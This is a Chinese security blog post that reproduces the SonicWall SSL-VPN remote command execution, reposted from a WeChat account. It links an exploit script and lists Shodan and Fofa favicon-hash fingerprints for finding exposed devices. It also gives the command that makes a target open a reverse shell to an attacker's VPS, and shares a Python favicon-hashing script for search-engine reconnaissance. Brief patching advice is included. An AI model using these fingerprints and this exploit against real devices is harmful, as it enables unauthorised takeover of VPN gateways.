SonicWall SSL-VPN RCE复现及iconhash脚本分享

admin
admin
admin
102800
文章
87
评论
2022年3月1日10:14:17评论484 views字数 6496阅读21分39秒阅读模式

SonicWall SSL-VPN RCE复现及iconhash脚本分享


△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface 


    SonicWall SSL-VPN 历史版本中存在漏洞,远程攻击者利用 CGI 程序处理逻辑漏洞,构造恶意的User-Agent,可造成远程任意命令执行,并获得主机控制权限

详细可参考  SonicWall SSL-VPNExploit:

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/


0x01 漏洞复现
0、EXP脚本下载
https://github.com/darrenmartyn/visualdoor

1、收集公开目标服务的指纹
Shodan指纹
http.favicon.hash:-1153950306http.favicon.hash:-2012355198
Fofa指纹
icon_hash="-1153950306"icon_hash="-2012355198"

2、EXP脚本利用
分析EXP发现其设计为在VPS直接进行运行。
本地监听一个shell端口,再通过发送指定报文,让目标服务器反弹shell到本地端口。
python2 visualdoor.py 目标URL VPS-IP Vps-Port

SonicWall SSL-VPN RCE复现及iconhash脚本分享




0x02 修复建议

临时修补建议

检测或替换http header中可能存在的命令执行特征字符串


通用修复建议
升级Sonic SMA版本


0x03 其他
    分享python2 iconhash计算脚本,适合自定义修改,可以打包成EXE使用。
    支持使用多种计算方式计算文件,图片和链接,基本上使用其的计文件和url的fofa和shodan hash选项就行

SonicWall SSL-VPN RCE复现及iconhash脚本分享

SonicWall SSL-VPN RCE复现及iconhash脚本分享

# -*- coding: UTF-8 -*- import requestsrequests.packages.urllib3.disable_warnings()import mmh3import hashlibimport sysimport osimport argparse
# hash image from urldef get_hash_url(url):  url = url.strip()   icon_hash_md5 = ''  icon_hash_mmh3 = ''  if url != '':    payload = ""    headers = {      #"Accept": "image/webp,image/apng,image/*,*/*;q=0.8",       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66",       "Referer": "{}".format(url),       "Pragma": "no-cache",       "Accept-Encoding": "gzf, deflate",       "Cache-Control": "no-cache",       "Accept-Language": "zh-CN,zh;q=0.9"    }    try:      content = requests.request("GET", url, data=payload, headers=headers, verify=False ,  timeout=5).content      icon_hash_md5 = hashlib.md5(content).hexdigest()      icon_hash_mmh3 = mmh3.hash(content)    except Exception , e:      print(e)  return icon_hash_md5, icon_hash_mmh3  # hash image base64 from urldef get_hash_url_base64(url):  url = url.strip()   icon_hash_md5 = ''  icon_hash_mmh3 = ''  if url != '':    payload = ""    headers = {      #"Accept": "image/webp,image/apng,image/*,*/*;q=0.8",       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66",       "Referer": "{}".format(url),       "Pragma": "no-cache",       "Accept-Encoding": "gzf, deflate",       "Cache-Control": "no-cache",       "Accept-Language": "zh-CN,zh;q=0.9"    }    try:      content = requests.request("GET", url, data=payload, headers=headers, verify=False ,  timeout=5).content      content = content.encode('base64')      icon_hash_md5 = hashlib.md5(content).hexdigest()      icon_hash_mmh3 = mmh3.hash(content)    except Exception , e:      print(e)  return icon_hash_md5, icon_hash_mmh3  # hash image  from filedef get_hash_file(filename):  filename = filename.strip()   icon_hash_md5 = ''  icon_hash_mmh3 = ''  if not os.path.isfile(filename):    pass  else:    with open(filename,'rb') as fopen:      #md5_obj = hashlib.md5()      #md5_obj.update(fopen.read())      #icon_hash_md5 = md5_obj.hexdigest()      content = fopen.read()      icon_hash_md5 = hashlib.md5(content).hexdigest()      icon_hash_mmh3 = mmh3.hash(content)    return icon_hash_md5, icon_hash_mmh3  
# hash image base64 from filedef get_hash_file_base64(filename):  filename = filename.strip()   icon_hash_md5 = ''  icon_hash_mmh3 = ''  if not os.path.isfile(filename):    pass  else:    with open(filename,'rb') as fopen:      content = fopen.read().encode('base64')      #print('content base64:n',content)      icon_hash_md5 = hashlib.md5(content).hexdigest()      icon_hash_mmh3 = mmh3.hash(content)    return icon_hash_md5, icon_hash_mmh3  

# hash stringdef get_hash_string(string):  icon_hash_md5 = ''  icon_hash_mmh3 = ''  content = string.strip()  icon_hash_md5 = hashlib.md5(content).hexdigest()  icon_hash_mmh3 = mmh3.hash(content)    return icon_hash_md5, icon_hash_mmh3    # hash string base64 def get_hash_string_base64(content):  icon_hash_md5 = ''  icon_hash_mmh3 = ''  content = string.strip().encode('base64')  icon_hash_md5 = hashlib.md5(content).hexdigest()  icon_hash_mmh3 = mmh3.hash(content)    return icon_hash_md5, icon_hash_mmh3                if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.description="""The hash computation By md5 and mmh3"""  parser.add_argument("-u", "--url", help="Specify target url, like 'http://1.1.1.1/favicon.ico'")  parser.add_argument("-f", "--file", help="Specify target file, like 'spring-favicon.ico' ")  parser.add_argument("-s", "--string", help="Specify target string, like '123456'")    args = parser.parse_args()    #args.url ="http://112.25.106.108/favicon.ico"  #args.file ='spring-favicon.ico'  #args.string ="123456"  #print("url:", args.url)  #print("file:", args.file)  #print("string:", args.string)  if len(sys.argv)== 1 :    print('please input some args or use --help !!!')    exit()  if args.url :    print('---------------------------')    url = args.url     icon_hash_md5, icon_hash_mmh3 = get_hash_url(url)    print('get_hash_url:{}'.format(url))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    #print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    #print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')    icon_hash_md5, icon_hash_mmh3  =get_hash_url_base64(args.url)    print('get_hash_url_base64:{}'.format(args.url))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')
  if args.file:    print('---------------------------')    filename = args.file    icon_hash_md5, icon_hash_mmh3 = get_hash_file(filename)    print('get_hash_file:{}'.format(filename))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    #print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    #print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')    icon_hash_md5, icon_hash_mmh3  = get_hash_file_base64(filename)    print('get_hash_file_base64:{}'.format(filename))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')
  if args.string:    print('---------------------------')    string = args.string    icon_hash_md5, icon_hash_mmh3 = get_hash_string(string)    print('get_hash_file:{}'.format(string))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    #print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    #print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')    icon_hash_md5, icon_hash_mmh3  = get_hash_string_base64(string)    print('get_hash_file_base64:{}'.format(string))    print('icon_hash_md5:{}'.format(icon_hash_md5))    print('icon_hash_mmh3:{}'.format(icon_hash_mmh3))    #print('tFofa:ticon_hash="{}"'.format(icon_hash_mmh3))    #print('tshodan:thttp.favicon.hash:{}'.format(icon_hash_mmh3))    print('---------------------------')




END



如您有任何问题、建议、需求请后台留言NOVASEC公众号!


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


SonicWall SSL-VPN RCE复现及iconhash脚本分享


如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。



本文始发于微信公众号(NOVASEC):SonicWall SSL-VPN RCE复现及iconhash脚本分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月1日10:14:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SonicWall SSL-VPN RCE复现及iconhash脚本分享http://cn-sec.com/archives/494641.html

发表评论

匿名网友 填写信息